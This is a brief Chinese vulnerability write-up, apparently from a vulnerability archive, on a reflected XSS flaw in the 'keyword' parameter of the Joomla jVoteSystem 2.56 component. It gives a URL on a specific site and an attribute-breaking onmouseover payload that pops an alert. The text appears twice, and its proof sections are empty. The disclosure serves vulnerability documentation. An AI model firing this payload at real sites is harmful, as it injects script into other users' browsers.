VULHUB ™

### 0x01 漏洞简介 Joomla jVoteSystem 2.56 Component的参数keyword存在反射性的XSS漏洞。 ### 0x02 漏洞分析 ``` http://www.9u4u.be/index.php?option=com_jvotesystem&view=polls&cat=cw&keyword=1&Itemid=12#jvotesystem ```  构造如下payload： ``` 1" onmouseover=javascript:alert(/MobhaM/) bad=" ``` 赋值给keyword，生成的html代码如下：  成功闭合<input>标签，并执行了javascript代码。 ### 0x03漏洞证明 

### 0x01 漏洞简介 Joomla jVoteSystem 2.56 Component的参数keyword存在反射性的XSS漏洞。 ### 0x02 漏洞分析 ``` http://www.9u4u.be/index.php?option=com_jvotesystem&view=polls&cat=cw&keyword=1&Itemid=12#jvotesystem ```  构造如下payload： ``` 1" onmouseover=javascript:alert(/MobhaM/) bad=" ``` 赋值给keyword，生成的html代码如下：  成功闭合<input>标签，并执行了javascript代码。 ### 0x03漏洞证明